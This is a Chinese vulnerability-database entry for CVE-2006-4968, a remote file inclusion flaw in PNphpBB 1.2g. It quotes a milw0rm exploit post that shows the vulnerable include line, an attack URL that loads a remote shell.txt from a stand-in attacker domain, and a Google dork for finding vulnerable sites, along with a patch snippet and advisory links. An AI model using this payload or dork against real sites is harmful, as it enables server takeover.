PNphpBB 'includes/functions_admin.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111070 漏洞类型 输入验证
发布时间 2006-09-18 更新时间 2006-09-27
CVE编号 CVE-2006-4968 CNNVD-ID CNNVD-200609-425
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2390
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-425
|漏洞详情
PNphpBB1.2g的includes/functions_admin.php中存在PHP远程文件包含漏洞,远程攻击者可以通过phpbb_root_path参数中的URL执行任意PHP代码。
|漏洞EXP
Yeah, another ZeroDay Smile

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}


Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2

# milw0rm.com [2006-09-18]
|参考资料

来源:VUPEN
名称:ADV-2006-3671
链接:http://www.frsirt.com/english/advisories/2006/3671
来源:noc.postnuke.com
链接:http://noc.postnuke.com/frs/download.php/1094/patch_1.2g-1.2i.diff.gz
来源:XF
名称:pnphpbb2-functionsadmin-file-include(29014)
链接:http://xforce.iss.net/xforce/xfdb/29014
来源:BID
名称:20097
链接:http://www.securityfocus.com/bid/20097
来源:BUGTRAQ
名称:20060920Re:AzzCoder=>PNphpBB(Latest)RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/446568/100/0/threaded
来源:BUGTRAQ
名称:20060918AzzCoder=>PNphpBB(Latest)RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/446267/100/0/threaded
来源:BUGTRAQ
名称:20060921Re:AzzCoder=>PNphpBB(Latest)RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/446617
来源:MILW0RM
名称:2390
链接:http://www.milw0rm.com/exploits/2390
来源:SECTRACK
名称:1016912
链接:http://securitytracker.com/id?1016912
来源:MILW0RM
名称:2390
链接:http://milw0rm.com/exploits/2390